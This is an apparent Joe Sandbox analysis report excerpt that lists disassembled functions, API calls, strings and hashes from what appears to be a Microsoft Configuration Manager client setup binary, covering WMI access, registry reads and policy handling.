                                                                                          • spLocator.createInstance( ((bUseAdminLocator == true) ? CLSID_WbemAdministrativeLocator : CLSID_WbemLocator ) ), xrefs: 00603462
                                                                                          • \\.\, xrefs: 006034D4
                                                                                          • CCM::Utility::Wmi::Namespace::Open, xrefs: 006033B2
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060365E
                                                                                          • ..\WmiNamespace.cpp, xrefs: 006035EA
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006033F3
                                                                                          • Could not create WMI locator class (%08lx), xrefs: 00603495
                                                                                          • ..\WmiNamespace.cpp, xrefs: 0060366B
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00603467
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006036B1
                                                                                          • ..\WmiNamespace.cpp, xrefs: 006033E8
                                                                                          • ..\WmiNamespace.cpp, xrefs: 006036A6
                                                                                          • pszNamespace != 0, xrefs: 006033EE
                                                                                          • AllowImpersonation(getPointer()), xrefs: 006036AC
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00603400
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006035DD
                                                                                          • SetNamespacePath(), xrefs: 00603659
                                                                                          • \\.\\, xrefs: 00603539, 0060353E, 00603546
                                                                                          • ^t, xrefs: 0060360B
                                                                                          • ..\WmiNamespace.cpp, xrefs: 006036BE
                                                                                          • ..\WmiNamespace.cpp, xrefs: 006035D2
                                                                                          • root, xrefs: 006034EB
                                                                                          • spLocator->ConnectServer( BString(sNamespace), NULL, NULL, NULL, 0, NULL, pContext, NamespacePtr::operator &() ), xrefs: 006035D8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$AllowImpersonation(getPointer())$CCM::Utility::Wmi::Namespace::Open$Could not create WMI locator class (%08lx)$Failed to open to WMI namespace '%s' (%08lx)$SetNamespacePath()$\\.\$\\.\\$pszNamespace != 0$root$root\$spLocator->ConnectServer( BString(sNamespace), NULL, NULL, NULL, 0, NULL, pContext, NamespacePtr::operator &() )$spLocator.createInstance( ((bUseAdminLocator == true) ? CLSID_WbemAdministrativeLocator : CLSID_WbemLocator ) )$^t
                                                                                          • API String ID: 3353525418-2011712476
                                                                                          • Opcode ID: f5cedb990649f18c75472c8e8096b17930fada72aa42b6c8c3a962c5e75afd0a
                                                                                          • Instruction ID: e40454f867bb4b0816b858ede98c1b497d5834a1ef8a22a23f0591cd8e1d5fda
                                                                                          • Opcode Fuzzy Hash: f5cedb990649f18c75472c8e8096b17930fada72aa42b6c8c3a962c5e75afd0a
                                                                                          • Instruction Fuzzy Hash: C1A1AEB1D80258ABDB11EBA4CC4ABEE7FB9AF55700F148059F5047B3C2D7B85A09CB61
                                                                                          Function 0062A2E9 Relevance: 54.4, APIs: 6, Strings: 25, Instructions: 170threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0062A2F0
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062A38C
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062A3EC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062A43B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062A48D
                                                                                            • Part of subcall function 005F6FE7: __EH_prolog3_catch.LIBCMT ref: 005F6FEE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062A4FD
                                                                                          Strings
                                                                                          • AADAuthUrl, xrefs: 0062A4A3
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A495
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A394
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062A436
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062A3E7
                                                                                          • regKey.GetString(c_szResourceUri_RegValue, aadInfo.sResourceUri ), xrefs: 0062A483
                                                                                          • SOFTWARE\Microsoft\CCM\AADConfigs, xrefs: 0062A3AB
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A47D
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A3DC
                                                                                          • ClientAppId, xrefs: 0062A3FF
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A4ED
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A42B
                                                                                          • regKey.GetString(c_szClientAppId_RegValue, aadInfo.sClientAppId), xrefs: 0062A431
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A505
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A443
                                                                                          • ResourceUri, xrefs: 0062A451
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A3F4
                                                                                          • !aadInfo.sClientAppId.empty() && !aadInfo.sResourceUri.empty(), xrefs: 0062A4F3
                                                                                          • regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szAADConfigs_RegKey, ((((0x00020000L)) | (0x0001) | (0x0008) | (0x0010)) , xrefs: 0062A3E2
                                                                                          • impersonator.ImpersonateProcess(), xrefs: 0062A382
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062A387
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062A4F8
                                                                                          • CcmUtilLib::CcmGetAADOnboardingInfo, xrefs: 0062A314
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062A488
                                                                                          • ..\CcmToken.cpp, xrefs: 0062A37C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch$CloseH_prolog3
                                                                                          • String ID: !aadInfo.sClientAppId.empty() && !aadInfo.sResourceUri.empty()$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$AADAuthUrl$CcmUtilLib::CcmGetAADOnboardingInfo$ClientAppId$ResourceUri$SOFTWARE\Microsoft\CCM\AADConfigs$impersonator.ImpersonateProcess()$regKey.GetString(c_szClientAppId_RegValue, aadInfo.sClientAppId)$regKey.GetString(c_szResourceUri_RegValue, aadInfo.sResourceUri )$regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szAADConfigs_RegKey, ((((0x00020000L)) | (0x0001) | (0x0008) | (0x0010))
                                                                                          • API String ID: 288237175-914748012
                                                                                          • Opcode ID: bfdc655f67580eaf59eff30be829dfb7b4f77827582b2f85fb6acda8c0474610
                                                                                          • Instruction ID: 50a891c9ceccd9eeea9990708f2a3b9420d2799d7a3ec512a2f7436e8dd8b5fd
                                                                                          • Opcode Fuzzy Hash: bfdc655f67580eaf59eff30be829dfb7b4f77827582b2f85fb6acda8c0474610
                                                                                          • Instruction Fuzzy Hash: A3510BB1944665ABCB11EBE5DD0AEFE7F75AF51B00F04404AF900B7382C7B85A05CB92
                                                                                          Function 005CC119 Relevance: 52.8, APIs: 5, Strings: 25, Instructions: 273threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005CC123
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00603360: __EH_prolog3_catch_GS.LIBCMT ref: 00603367
                                                                                            • Part of subcall function 00603360: GetCurrentThreadId.KERNEL32 ref: 006033F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005CC1BC
                                                                                            • Part of subcall function 0060C04D: __EH_prolog3_catch.LIBCMT ref: 0060C054
                                                                                            • Part of subcall function 0060C04D: GetCurrentThreadId.KERNEL32 ref: 0060C0C4
                                                                                            • Part of subcall function 0060C04D: __CxxThrowException@8.LIBCMT ref: 0060C134
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005CC254
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005CC2F1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005CC3CF
                                                                                          Strings
                                                                                          • localpolicy.cpp, xrefs: 005CC2F9
                                                                                          • spNS.DeleteInstance(sPath.c_str()), xrefs: 005CC2E7
                                                                                          • localpolicy.cpp, xrefs: 005CC1AC
                                                                                          • localpolicy.cpp, xrefs: 005CC25C
                                                                                          • Failed to connect to policy namespace. Error 0x%x, xrefs: 005CC1EA
                                                                                          • localpolicy.cpp, xrefs: 005CC2E1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005CC2EC
                                                                                          • __RELPATH, xrefs: 005CC277
                                                                                          • spNS.DeleteInstance(sPath.c_str()), xrefs: 005CC3C5
                                                                                          • localpolicy.cpp, xrefs: 005CC3BF
                                                                                          • __RELPATH, xrefs: 005CC352
                                                                                          • Failed to delete instance %s. Error 0x%x, xrefs: 005CC409
                                                                                          • Successfully revoked client auto-upgrade local policy., xrefs: 005CC444
                                                                                          • \\.\root\ccm\policy\machine\requestedconfig, xrefs: 005CC184
                                                                                          • Failed to delete instance %s. Error 0x%x, xrefs: 005CC32B
                                                                                          • RevokeLocalUpgradePolicy, xrefs: 005CC161
                                                                                          • localpolicy.cpp, xrefs: 005CC244
                                                                                          • Failed to revoke client upgrade local policy. Error 0x%x, xrefs: 005CC499
                                                                                          • spNS.Open(c_szMachinePolicyNS), xrefs: 005CC1B2
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005CC3CA
                                                                                          • localpolicy.cpp, xrefs: 005CC1C4
                                                                                          • localpolicy.cpp, xrefs: 005CC3D7
                                                                                          • GetPolicyInstances(spNS, spSchedule, spProgram), xrefs: 005CC24A
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005CC24F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005CC1B7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catch_$Exception@8H_prolog3_catchThrow
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$Failed to connect to policy namespace. Error 0x%x$Failed to delete instance %s. Error 0x%x$Failed to delete instance %s. Error 0x%x$Failed to revoke client upgrade local policy. Error 0x%x$GetPolicyInstances(spNS, spSchedule, spProgram)$RevokeLocalUpgradePolicy$Successfully revoked client auto-upgrade local policy.$\\.\root\ccm\policy\machine\requestedconfig$__RELPATH$__RELPATH$localpolicy.cpp$localpolicy.cpp$localpolicy.cpp$localpolicy.cpp$localpolicy.cpp$localpolicy.cpp$localpolicy.cpp$localpolicy.cpp$spNS.DeleteInstance(sPath.c_str())$spNS.DeleteInstance(sPath.c_str())$spNS.Open(c_szMachinePolicyNS)
                                                                                          • API String ID: 1022113445-4169778392
                                                                                          • Opcode ID: 4bd5a179377c031b48c35dd58cd2116d4be098fba399c4bfcb2ea7225cb531ca
                                                                                          • Instruction ID: 5d477feaa615e707b8eab44c26d0a05c4a7528c5ea6671bf3706825c28804465
                                                                                          • Opcode Fuzzy Hash: 4bd5a179377c031b48c35dd58cd2116d4be098fba399c4bfcb2ea7225cb531ca
                                                                                          • Instruction Fuzzy Hash: 74B16B71D4025CEEDB20DBA4CD4AFEEBEB9BF51700F148099E609B7182DB705A48CB61
                                                                                          Function 005B694B Relevance: 52.7, APIs: 11, Strings: 19, Instructions: 168threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B6952
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?,GetFileVersion,00000030,005A1F79,?,?,00000001,00000000,00000000,?,00000000,00000001,00000001,00000000,00000000), ref: 005B69BE
                                                                                          • GetLastError.KERNEL32(?,?,GetFileVersion,00000030,005A1F79,?,?,00000001,00000000,00000000,?,00000000,00000001,00000001,00000000,00000000), ref: 005B69CA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B69FC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B6A5E
                                                                                          • GetFileVersionInfoW.VERSION(?,?,?,?,00000000,?,?,GetFileVersion,00000030,005A1F79,?,?,00000001,00000000,00000000,?), ref: 005B6A7F
                                                                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,GetFileVersion,00000030,005A1F79,?,?,00000001,00000000,00000000,?), ref: 005B6A88
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B6ABE
                                                                                          • VerQueryValueW.VERSION(?,006DCC80,?,?,?,?,?,?,00000000,?,?,GetFileVersion,00000030,005A1F79,?,?), ref: 005B6AE4
                                                                                          • GetLastError.KERNEL32(?,006DCC80,?,?,?,?,?,?,00000000,?,?,GetFileVersion,00000030,005A1F79,?,?), ref: 005B6AED
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B6B23
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$ErrorLast$FileInfoVersion$H_prolog3H_prolog3_catchQuerySizeValue
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%u.%u.%04u.%04u$(Buffer.resize(uSize) == true) != 0$GetFileVersion$GetFileVersionInfoW( (LPWSTR)sPath.c_str(), uHandle, uSize, Buffer.getBuffer() )$VerQueryValueW( Buffer.getBuffer(), (LPTSTR)L"\\", (LPVOID*)&pFixedFileInfo, &uLength )$t)l$uSize > 0$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 1185347379-1815811704
                                                                                          • Opcode ID: 893eae12e97b739985195ccad74b6a602239adcf3035810443bfd74a8cacee36
                                                                                          • Instruction ID: f60573fc3e3004f4d1121ab9323cdbc6b0c8fb3a088a246d5281019d00bf3e9e
                                                                                          • Opcode Fuzzy Hash: 893eae12e97b739985195ccad74b6a602239adcf3035810443bfd74a8cacee36
                                                                                          • Instruction Fuzzy Hash: EE51D371D4020AEADF10EFA48D49AFEBEBABF05710F14805AF944F7282D7799940C7A1
                                                                                          Function 005A1D30 Relevance: 51.0, APIs: 9, Strings: 20, Instructions: 255threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005A1D3A
                                                                                            • Part of subcall function 00623DD4: __EH_prolog3_catch.LIBCMT ref: 00623DDB
                                                                                            • Part of subcall function 00623CB6: __EH_prolog3_catch.LIBCMT ref: 00623CBD
                                                                                            • Part of subcall function 00623D45: __EH_prolog3_catch.LIBCMT ref: 00623D4C
                                                                                            • Part of subcall function 00624502: __EH_prolog3_catch.LIBCMT ref: 00624509
                                                                                            • Part of subcall function 00624884: __EH_prolog3_catch.LIBCMT ref: 0062488B
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,?,?,CSetupEnvironment::Initialize), ref: 005A1DDC
                                                                                          • GetLastError.KERNEL32 ref: 005A1DE6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A1E1B
                                                                                            • Part of subcall function 005B849A: __EH_prolog3_catch_GS.LIBCMT ref: 005B84A1
                                                                                            • Part of subcall function 005B849A: GetCurrentThreadId.KERNEL32 ref: 005B8526
                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 005A1E7B
                                                                                          • GetLastError.KERNEL32 ref: 005A1E85
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A1EBA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A1FDD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A202D
                                                                                          Strings
                                                                                          • setupenv.cpp, xrefs: 005A1EC3
                                                                                          • DetectPlatform(m_sPlatform), xrefs: 005A1FD3
                                                                                          • GetModuleFileNameW(0, szPath, (sizeof(szPath)/sizeof(szPath[0]))) > 0, xrefs: 005A1E11
                                                                                          • setupenv.cpp, xrefs: 005A1FE6
                                                                                          • Detected client installed with version '%s', xrefs: 005A20A0
                                                                                          • setupenv.cpp, xrefs: 005A1EAA
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A1EB5
                                                                                          • setupenv.cpp, xrefs: 005A1FCD
                                                                                          • \, xrefs: 005A1EDD
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A2028
                                                                                          • GetFullPathNameW(m_sModulePath, (sizeof(szPath)/sizeof(szPath[0])), szPath, 0) > 0, xrefs: 005A1EB0
                                                                                          • CSetupEnvironment::Initialize, xrefs: 005A1D63
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A1E16
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A1FD8
                                                                                          • b, xrefs: 005A2095
                                                                                          • IsClientInstalled(m_bClientInstalled), xrefs: 005A2023
                                                                                          • setupenv.cpp, xrefs: 005A2036
                                                                                          • setupenv.cpp, xrefs: 005A1E0B
                                                                                          • setupenv.cpp, xrefs: 005A201D
                                                                                          • setupenv.cpp, xrefs: 005A1E24
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread$ErrorH_prolog3_catch_LastName$FileFullModulePath
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CSetupEnvironment::Initialize$DetectPlatform(m_sPlatform)$Detected client installed with version '%s'$GetFullPathNameW(m_sModulePath, (sizeof(szPath)/sizeof(szPath[0])), szPath, 0) > 0$GetModuleFileNameW(0, szPath, (sizeof(szPath)/sizeof(szPath[0]))) > 0$IsClientInstalled(m_bClientInstalled)$\$b$setupenv.cpp$setupenv.cpp$setupenv.cpp$setupenv.cpp$setupenv.cpp$setupenv.cpp$setupenv.cpp$setupenv.cpp
                                                                                          • API String ID: 749637812-1787247226
                                                                                          • Opcode ID: 0ab2374e76e435ca26ec3c66b29f5b7a0a3bdbd70c710df44d08ad92021b74e2
                                                                                          • Instruction ID: a137ed01d7046928d9b9f15de0404f5978c87e2a3a52b3d44336d9d9f43636c1
                                                                                          • Opcode Fuzzy Hash: 0ab2374e76e435ca26ec3c66b29f5b7a0a3bdbd70c710df44d08ad92021b74e2
                                                                                          • Instruction Fuzzy Hash: 2791F471941269AADB20EB648C4EFEE7FA9BF11700F0040D9F905BB2C2DB785B44CB65
                                                                                          Function 00603B66 Relevance: 50.9, APIs: 6, Strings: 23, Instructions: 184threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00603B6D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603BC5
                                                                                            • Part of subcall function 006092A8: __EH_prolog3.LIBCMT ref: 006092AF
                                                                                            • Part of subcall function 00609305: __EH_prolog3.LIBCMT ref: 0060930C
                                                                                            • Part of subcall function 00609305: SysFreeString.OLEAUT32(000000FF), ref: 00609321
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603C23
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603C61
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603D19
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603DC2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$FreeH_prolog3_catchString
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$CCM::Utility::Wmi::Namespace::Query$WQL$WQL$getPointer()->ExecQuery( BString(L"WQL"), BString(pszQuery), lFlags, pContext, ppEnum )$null() == false$pThis->CheckConnection()$ppEnum != 0$pszQuery != 0
                                                                                          • API String ID: 3270846742-1158606948
                                                                                          • Opcode ID: db4c4cddf17061f1f1003fcda8a13fbcbbf2eee24f459ab031a82c1530f74593
                                                                                          • Instruction ID: 631cb7468c4ea1da3bdb5d64ac70dc601b1c3d9293e0323942cf80d13f74b4ba
                                                                                          • Opcode Fuzzy Hash: db4c4cddf17061f1f1003fcda8a13fbcbbf2eee24f459ab031a82c1530f74593
                                                                                          • Instruction Fuzzy Hash: 4861F471A80259ABCB18EFA4C84AEEF7F6AAF54704F148059F5046B3C2DB798E05CB51
                                                                                          Function 00608558 Relevance: 50.9, APIs: 9, Strings: 20, Instructions: 173threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0060855F
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006085C0
                                                                                          • PathIsUNCServerShareW.SHLWAPI(?,?,CCM::Utility::Filesystem::RecursiveCreatePath,0000004C,00607ED9,?,00000000,?), ref: 00608600
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060862D
